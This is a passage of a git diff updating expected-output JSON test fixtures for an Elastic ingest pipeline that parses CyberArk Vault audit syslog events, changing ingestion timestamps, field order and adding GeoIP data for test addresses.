{\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -180,10 +189,19 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "PVWAGWUser" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -232,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546296400Z", + "ingested": "2021-12-14T14:42:03.559590480Z", "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -314,7 +332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546301900Z", + "ingested": "2021-12-14T14:42:03.559590918Z", "original": "\u003c5\u003e1 2021-03-10T08:31:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:31:50\",\"IsoTimestamp\":\"2021-03-10T08:31:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -397,7 +415,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546306600Z", + "ingested": "2021-12-14T14:42:03.559591390Z", "original": "\u003c5\u003e1 2021-03-10T22:37:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:37:00\",\"IsoTimestamp\":\"2021-03-10T22:37:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.10\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -421,10 +439,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "source": { @@ -481,7 +508,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546311200Z", + "ingested": "2021-12-14T14:42:03.559591804Z", "original": "\u003c5\u003e1 2021-03-11T17:38:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:05\",\"IsoTimestamp\":\"2021-03-11T17:38:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "19", "kind": "event", @@ -505,10 +532,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "source": { @@ -565,7 +601,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546316700Z", + "ingested": "2021-12-14T14:42:03.559592226Z", "original": "\u003c5\u003e1 2021-03-11T17:48:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:22\",\"IsoTimestamp\":\"2021-03-11T17:48:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "19", "kind": "event", @@ -596,10 +632,19 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", "user": { "name": "PVWAGWUser" }, - "address": "67.43.156.14", "ip": "67.43.156.14" }, "tags": [ @@ -649,7 +694,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546322Z", + "ingested": "2021-12-14T14:42:03.559592629Z", "original": "\u003c5\u003e1 2021-03-11T18:02:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:02:57\",\"IsoTimestamp\":\"2021-03-11T18:02:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -673,17 +718,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "Administrator" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "PSMPGW_SSH" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -733,7 +796,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546327300Z", + "ingested": "2021-12-14T14:42:03.559593038Z", "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "19", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json index ed45fb133ef..99ede54c704 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.0.15", - "ip": "10.0.0.15" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VLT01", @@ -28,6 +16,11 @@ "10.0.0.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -46,14 +39,21 @@ "host": { "name": "VLT01" }, + "source": { + "address": "10.0.0.15", + "ip": "10.0.0.15" + }, "event": { "severity": 2, "action": "partial gateway connection", - "ingested": "2021-12-09T13:36:40.675511Z", + "ingested": "2021-12-14T14:42:04.837900088Z", "original": "\u003c5\u003e1 2021-03-25T09:20:07Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 05:20:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T09:20:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e20\u003c/MessageID\u003e\\n \u003cDesc\u003ePartial Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMGw_COMP01\u003c/Issuer\u003e\\n \u003cAction\u003ePartial Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003eAdministrator\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePartial Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 05:20:07\",\"IsoTimestamp\":\"2021-03-25T09:20:07Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"20\",\"Desc\":\"Partial Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_COMP01\",\"Action\":\"Partial Gateway Connection\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Partial Gateway Connection\",\"GatewayStation\":\"\"}}}", "code": "20", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json index f91eafda9e4..209e1cf6e5c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "old backup files deletion start", - "ingested": "2021-12-09T13:36:40.797519200Z", + "ingested": "2021-12-14T14:42:04.957314489Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"202\",\"Desc\":\"Old Backup Files Deletion Start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Old Backup Files Deletion Start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Old Backup Files Deletion Start\",\"GatewayStation\":\"\"}}}", "code": "202", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json index e7b1f09d867..81e348f46ee 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "old backup files deletion end", - "ingested": "2021-12-09T13:36:40.949257400Z", + "ingested": "2021-12-14T14:42:05.068897130Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"203\",\"Desc\":\"Old Backup Files Deletion End\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Old Backup Files Deletion End\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Old Backup Files Deletion End\",\"GatewayStation\":\"\"}}}", "code": "203", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json index ffafb7bd4ff..e38ce386021 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json @@ -79,7 +79,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.072867800Z", + "ingested": "2021-12-14T14:42:05.178379270Z", "original": "Apr 07 09:51:42 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=radiussrv.cyberark.local;username=test12;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"test12\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1604943844\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=radiussrv.cyberark.local;username=test12;\",\"Message\":\"CPM Verify 